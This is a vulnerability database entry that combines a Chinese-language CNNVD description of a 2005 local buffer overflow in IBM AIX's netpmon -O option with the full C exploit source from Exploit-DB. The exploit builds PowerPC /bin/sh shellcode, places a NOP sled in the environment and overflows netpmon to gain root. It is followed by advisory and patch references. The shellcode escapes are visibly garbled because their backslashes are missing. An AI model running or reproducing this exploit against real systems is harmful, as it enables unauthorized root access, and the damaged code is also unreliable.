https://www.exploit-db.com/exploits/1044
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-507

IBMAIX是一款商业性质的操作系统。IBMAIXnetpmon不正确处理-O选项，本地攻击者可以利用这个漏洞进行缓冲区溢出攻击，可能获得root用户权限。netpmon用于监视网络I/O和网络相关的CPU使用率，由于对-O选项的参数缺少充分缓冲区边界检查，提交超长参数作为-O选项值，可触发缓冲区溢出，可能获得root用户权限。

/*
 *
 *    IBM AIX netpmon elevated privileges exploit
 *
 *    I just wanted to play with PowerPC (Tested on 5.2)
 *
 *    intropy (intropy <at> caughq.org)
 *
 */

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

#define DEBUG 1
#define BUFFERSIZE 2048
#define EGGSIZE 2048

#define NOP 0x60
#define ADDRESS 0x2ff22fff-(BUFFERSIZE/2)

char shellcode_binsh[] =
"x7cxa5x2ax79"     /* xor.    r5,r5,r5             */
"x40x82xffxfd"     /* bnel    <shellcode>          */
"x7fxe8x02xa6"     /* mflr    r31                  */
"x3bxffx01x20"     /* cal     r31,0x120(r31)       */
"x38x7fxffx08"     /* cal     r3,-248(r31)         */
"x38x9fxffx10"     /* cal     r4,-240(r31)         */
"x90x7fxffx10"     /* st      r3,-240(r31)         */
"x90xbfxffx14"     /* st      r5,-236(r31)         */
"x88x5fxffx0f"     /* lbz     r2,-241(r31)         */
"x98xbfxffx0f"     /* stb     r5,-241(r31)         */
"x4cxc6x33x42"     /* crorc   cr6,cr6,cr6          */
"x44xffxffx02"     /* svca                         */
"/bin/sh"
"x05";

unsigned long cex_load_environment(char *env_buffer, char *address_buffer, char *payload, int environment_size, int buffer_size) {
        int count, env_size = strlen(payload) + environment_size + 4 + 1;
        unsigned long address, *ret_addressp;
        
        if (DEBUG) printf("Adding nops to environment buffer...");
        for ( count = 0; count < env_size - strlen(payload) - 1; count++ ) {
            *(env_buffer++) = NOP;
        }
        if (DEBUG) printf("size %d...n", count);
        if (DEBUG) printf("Adding payload to environment buffer...");
        for ( count = 0; count < strlen(payload); count++ ) {
            *(env_buffer++) = payload[count];
        }
        if (DEBUG) printf("size %d...n", count);

        env_buffer[env_size - 1] = '';

        memcpy(env_buffer, "CAU=", 4);

	memset(address_buffer, 'A', buffer_size);

        address = ADDRESS;

        if (DEBUG) printf("Going for address @ 0x%lxn", address);

        if (DEBUG) printf("Adding return address to buffer...");
        ret_addressp = (unsigned long *)(address_buffer+3);
        for ( count = 0; count < buffer_size; count += 4) {
                *(ret_addressp++) = address;
        }
        if (DEBUG) printf("size %d...n", count);

        address_buffer[buffer_size - 1] = '';

        return( 0 );
}

int main()
{
    char *buffer, *egg;
    char *args[3], *envs[2];

    buffer = (char *)malloc(BUFFERSIZE);
    egg = (char *)malloc(EGGSIZE);

    cex_load_environment(egg, buffer, (char *)&shellcode_binsh, EGGSIZE, BUFFERSIZE);

    args[0] = "/usr/bin/netpmon";
    args[1] = "-O";
    args[2] = buffer;
    args[3] = NULL;

    envs[0] = egg;
    envs[1] = NULL;

    execve( "/usr/bin/netpmon", args, envs );

    return( 0 );
}

// milw0rm.com [2005-06-14]

来源:IDEFENSE
名称:20050210IBMAIXnetpmonLocalBufferOverflowVulnerability
链接:http://www.idefense.com/application/poi/display?id=197&type;=vulnerabilities
来源:XF
名称:ibm-aix-netpmon-bo(19278)
链接:http://xforce.iss.net/xforce/xfdb/19278
来源:AIXAPAR
名称:IY67807
链接:http://www-1.ibm.com/support/search.wss?rs=0&q;=IY67807&apar;=only
来源:AIXAPAR
名称:IY67136
链接:http://www-1.ibm.com/support/search.wss?rs=0&q;=IY67136&apar;=only
来源:AIXAPAR
名称:IY67124
链接:http://www-1.ibm.com/support/search.wss?rs=0&q;=IY67124&apar;=only
来源:BID
名称:12517
链接:http://www.securityfocus.com/bid/12517
来源:SECUNIA
名称:14237
链接:http://secunia.com/advisories/14237